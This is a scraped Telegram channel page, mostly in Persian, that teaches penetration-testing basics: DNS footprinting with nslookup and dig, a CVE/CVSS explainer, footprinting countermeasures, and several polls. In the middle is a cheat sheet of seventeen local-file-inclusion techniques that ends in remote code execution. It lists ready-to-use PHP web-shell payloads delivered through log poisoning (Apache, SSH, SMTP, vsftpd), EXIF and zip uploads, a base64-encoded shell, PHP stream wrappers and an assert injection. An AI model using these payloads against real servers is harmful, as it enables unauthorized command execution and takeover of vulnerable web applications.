Try Hack Box – Telegram
Try Hack Box
5.79K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
#Footprinting #DNS
می توانید اطلاعات بیشتری در مورد نحوه انجام انتقال منطقه DNS به دست آورید با این دامنه ها در :
https://digi.ninja/projects/zonetransferme.php.

@TryHackBox
یکی از دو مورد در این مرحله اتفاق خواهد افتاد. یک پیغام خطا دریافت خواهید کرد نشان می دهد که انتقال ناموفق بوده است، در غیر این صورت ثروتی به شما بازگردانده می شود
اطلاعات، همانطور که در پرس و جو در مثال برای دامنه h4cker.org نشان داده شده است.
# nslookup h4cker.org
Dig
ابزار دیگری است که می توانید برای ارائه این نوع اطلاعات از آن استفاده کنید. ساخته شده است در اکثر توزیع‌های لینوکس وجود دارد و می‌توان آن را از Bash یا خط فرمان هنگام نصب در ویندوز اجرا کرد dig ابزار قدرتمندی است که می تواند باشد برای بررسی سیستم DNS استفاده می شود. مثال استفاده از dig to را نشان می دهد اطلاعاتی در مورد دامنه h4cker.org به دست آورید.
# dig h4cker.org
همچنین طیف وسیعی از ابزارها وجود دارد که می توان از آنها برای بازجویی از سرورهای DNS استفاده کرد.
از جمله موارد زیر:

DomainDossier: https://centralops.net/co/domaindossier.aspx
• ViewDNS: https://viewdns.info
• MassDNS: https://github.com/blechschmidt/massdns
• Domain to IP Converter: https://domaintoipconverter.com
• DNSMap: https://code.google.com/archive/p/dnsmap/


اطلاعات DNS داخلی نباید فقط در اختیار هکرها قرار گیرد. هکرها می توانید از این اطلاعات برای پیدا کردن سرورهای دیگر استفاده کنید شبکه، و می تواند به آنها کمک کند تا شبکه را ترسیم کنند و انواع آن را فرموله کنند
حملات برای راه اندازی به خط اول خروجی قبلی که دارد توجه کنید
example.com فهرست شده است. مقدار نهایی 3600 را در آن خط مشاهده کنید. آن TTL است
مقداری که قبلاً مورد بحث قرار گرفت و به هکرها از مدت زمان DNS اطلاع می دهد
Poisoning ادامه خواهد داشت به خاطر داشته باشید که 3600 ثانیه 60 دقیقه است. منطقه
انتقال ها برای استفاده توسط سرورهای DNS ثانویه برای همگام سازی با آنها در نظر گرفته شده است
سرور DNS اولیه شما باید مطمئن شوید که فقط آدرس های IP خاص هستند مجاز به درخواست انتقال منطقه است. اکثر سیستم عامل ها این را به طور پیش فرض محدود می کنند.
تمام سرورهای DNS باید تست شوند. اغلب این مورد است که اولیه تنگ است امنیت اما ثانویه ممکن است در صورت پیکربندی نادرست امکان انتقال منطقه را فراهم کند.


@TryHackBox
دوستان از کانال حمایت کنید و اگه پیشنهادی هم دارید کامنت کنید یا انتقادی حمایت کنید تا دوستانی هم که از لحاظ مالی یا سطح زبان پایین یا نمیخوان پول بدن به دوره های basic امنیت از این کانال استفاده کنند بخش هایی از لینوکس هم میزارم که بعد عملی کار کنیم ممنون .
@TryHackBox
از پست های کانال راضی هستید؟
Anonymous Poll
82%
بله
16%
خیر
2%
در کامنت ها میگم
Common Vulnerabilities and Exposures (CVE) چیست؟

T.me/TryHackBox
Try Hack Box
Common Vulnerabilities and Exposures (CVE) چیست؟ T.me/TryHackBox
Common Vulnerabilities and Exposures (CVE) چیست؟


آسیب‌پذیری‌ها و مواجهه‌های رایج (CVE) فهرستی از نقص‌های امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکت‌ها در ارزیابی خطر ناشی از آسیب‌پذیری یا قرار گرفتن در معرض خودتان رتبه‌بندی می‌شوند. وقتی شخصی به یک CVE مراجعه می‌کند، می‌توانید به راحتی آسیب‌پذیری را با جستجو پیدا کنید، و به‌دلیل بررسی ساختاریافته و مستمر و مستندسازی آسیب‌پذیری یا قرار گرفتن در معرض به شیوه‌ای ثابت، می‌توانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.

ورودی‌های CVE مختصر هستند، شامل داده‌های فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاح‌ها نمی‌شوند. این جزئیات در سایر پایگاه‌های داده، از جمله پایگاه داده آسیب‌پذیری ملی ایالات متحده (NVD)، پایگاه یادداشت‌های آسیب‌پذیری CERT/CC، و فهرست‌های اضافی که توسط فروشنده مورد نظر یا سایر سازمان‌های امنیت سایبری کنترل می‌شوند، ظاهر می‌شوند. در سراسر این سیستم‌های مختلف، شناسه‌های CVE راهی قابل اعتماد برای درک نقص‌های امنیتی منحصربه‌فرد به روشی قابل تکرار به کاربران می‌دهند.

یک استاندارد مرتبط برای رتبه‌بندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیب‌پذیری مشترک (CVSS) یافت می‌شود، مجموعه‌ای از استانداردهای باز برای تخصیص یک عدد به یک آسیب‌پذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاوره‌های CVE، NVD و CERT فهرست شده‌اند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.

CVE توسط شرکت MITRE مدیریت می‌شود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی می‌شود.
#cve
@TryHackBox
بخش هایی از لینوکس هم در کانال اضافه می شود ... .

#linux
Network Footprinting

کشف و تعریف محدوده شبکه می تواند یکی دیگر از گام های مهم دیگری باشد که باید در نظر گرفته شود. دانستن اینکه آدرس‌های IP هدف از کجا شروع می‌شوند و کجا متوقف می‌شوند، زمان مورد نیاز برای تعیین جزئیات را به شدت محدود می‌کند.
بعدا- البته به شرطی که هدف شما در محدوده IP خودش عمل کند. اگر هدف شما اجرای سرویس‌ها در یک ابر اتفاق افتاد (و خیالتان راحت باشد، ما دیگری داریم کل فصل اختصاص داده شده به ابر آینده)، این ممکن است تا حدودی ناامید کننده باشد، اما حداقل می دانید که با چه چیزی روبرو هستید. یکی از ساده‌ترین راه‌ها برای دیدن اینکه سازمان در چه محدوده‌ای مالکیت دارد یا در آن فعالیت می‌کند حداقل در سطح بالا، استفاده از اطلاعات رجیستری آزادانه در دسترس است.

#Footprinting
#network
@TryHackBox
Footprinting Countermeasures

اقداماتی برای جلوگیری از Footprinting :


در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .

سازمان ها و کارکنان از malicious footprinting :

• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایت‌های شبکه‌های اجتماعی محدود می‌کند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث

• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.

#Footprinting
@TryHackBox
Network Forensics Privacy and Security

#network
#Forensics
T.me/Library_Sec
1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target
.com

/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>

/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload

i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

If no success then try writing files.
———————————————————
6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD

i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://

/show.php?page=expect://ls
———————————————————
12. input://

POST /index.php?page=php://input HTTP/1.1

<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");

Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————

@TryHackBox
Forwarded from Try Hack Box
Lpic1 همه بلدید ؟
Anonymous Poll
38%
بله
44%
خیر
18%
دارم یاد میگیرم
آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت

آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفه‌ای آموزش امنیت سایبری را که هر ساله بیش از 40000 فن‌آور امنیت سایبری را آموزش می‌دهد، در سال 1989 تأسیس کرد.

ادامه شو میتونید از طریق لینک زیر مطالعه کنید :

https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html

Or

https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/


@TryHackBox
🕊1
کدام یک از موارد زیر بهترین انتخاب برای Footprinting است
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
Anonymous Quiz
42%
Netcraft
4%
Yesware